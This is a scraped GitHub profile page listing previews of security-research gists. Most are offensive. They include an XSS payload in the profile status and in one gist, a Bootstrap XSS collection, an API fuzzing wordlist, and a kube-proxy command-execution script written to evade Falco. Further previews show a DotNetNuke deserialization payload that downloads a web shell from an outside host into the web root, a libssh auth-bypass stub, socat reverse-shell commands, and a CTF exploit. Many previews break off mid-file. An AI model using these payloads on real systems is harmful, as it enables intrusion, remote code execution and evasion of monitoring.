Skip to content

Instantly share code, notes, and snippets.

View pnigos's full-sized avatar
:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=

pnig0s pnigos

:octocat:
http://g.com/#'"/onmouseover="prompt(1)"/x=
201 followers · 22 following
View GitHub Profile
@BlackFan
BlackFan / Bootstrap_XSS.md
Last active April 17, 2025 14:33
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active July 18, 2025 19:12
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
@bgeesaman
bgeesaman / kphcme.sh
Last active March 21, 2021 00:45
GKE/Kube-proxy host command execution via kubectl exec
#!/usr/bin/env bash
# Credit: https://twitter.com/_fel1x
# poc: https://twitter.com/_fel1x/status/1151487051986087936
# Adapted to GKE/kube-proxy by: https://twitter.com/bradgeesaman
# and to avoid detection by Falco's default rules
read -r -d '' ESCAPE <<'EOF'
#!/bin/sh
@akhil-reni
akhil-reni / ssrf_iframe.svg
Created April 4, 2019 11:17
SVG Foreign Objects IFrame SSRF
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@pnigos
pnigos / testest
Created January 19, 2019 05:22 — forked from bearerai/testest
http://g.com/#'"/onmouseover="prompt(1)"/x=
http://g.com/#'"/onmouseover="prompt(1)"/x=
@hub2
hub2 / exploit.py
Created January 4, 2019 18:57
Flaglab Real World CTF
#!/usr/bin/env python3
import requests
import sys
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import random
import logging
import time
@GlitchWitch
GlitchWitch / DotNetNuke CVE-2017-9822 PoC
Created October 29, 2018 21:04
DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us
@mlosapio
mlosapio / CVE-2018-10933-test
Last active February 3, 2024 18:50
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
@staaldraad
staaldraad / socat through proxy
Last active December 16, 2024 17:21
# Listener on x.x.x.x:443:
socat file:`tty`,raw,echo=0 tcp-listen:443
# Reverse shell proxy server is at 10.10.10.1:8222:
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
@topolik
topolik / json-deserialization-ldap.sh
Created August 17, 2018 20:49
Backend script based on @pwntester JSON deserialization research
#!/bin/bash
echo "Starting Apache DS using docker @ ldap://localhost:10389"
docker run --name json-deser-ldap -d -p 10389:10389 greggigon/apacheds
echo "... waiting 20 seconds to start Apache DS"
sleep 20
# password: secret, if used with LDAP login
(cat <<"EOF"